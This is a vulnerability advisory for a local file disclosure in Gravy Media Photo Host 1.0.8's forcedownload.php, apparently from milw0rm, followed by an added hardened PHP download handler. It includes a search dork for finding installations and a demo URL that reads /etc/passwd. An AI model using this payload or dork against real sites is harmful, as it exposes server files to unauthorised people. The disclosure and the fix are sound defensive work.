Gravy Media Photo Host 1.0.8 - Local File Disclosure
Author: Lo$er
type: webapps
platform: php
date_added: 2009-06-21
verified: 1
codes: OSVDB-55280;CVE-2009-2184
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================
Vendor: http://www.gravy-media.com/
Download: register to download
Dork: "Powered by Gravy Media"
Discovered By: Lo$er
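====Vulnerable code (forcedownload.php)====
// line 27: user-controlled path taken straight from the query string
$filename = $_GET['file'];
// line 70: the file at that path is streamed to the client
readfile("$filename");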
====Demo====
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
# milw0rm.com [2009-06-22]
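
====Hardened handler (added example)====
The following is an added example, not code from the advisory or from the vendor: one way to write forcedownload.php so that the `file` parameter can only name a file inside a single storage directory. The directory name `uploads` and the helper `resolve_download()` are assumptions made for illustration.

```php
<?php
// Added example: hardened download handler (not the vendor's code).
// ASSUMPTION: all hosted images live in one directory, here "uploads/".
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';   // hypothetical storage location

/**
 * Map a client-supplied name to a regular file inside $baseDir.
 * Returns the canonical path, or null if the name does not resolve there.
 */
function resolve_download(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                        // storage directory missing
    }
    // Keep only the last path component: "/etc/passwd" -> "passwd".
    $name = basename(str_replace('\\', '/', $requested));
    if ($name === '' || $name === '.' || $name === '..'
        || strpos($name, "\0") !== false) {
        return null;
    }
    // realpath() follows symlinks, so a link leaving the directory
    // is caught by the prefix check below.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                        // resolved outside the directory
    }
    return $path;
}

$raw  = $_GET['file'] ?? '';
$path = is_string($raw) ? resolve_download($raw, UPLOAD_DIR) : null;
if ($path === null) {
    http_response_code(404);                // same answer for every rejection
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

With this handler the request shown under Demo resolves to `uploads/passwd`, which does not exist, and returns 404.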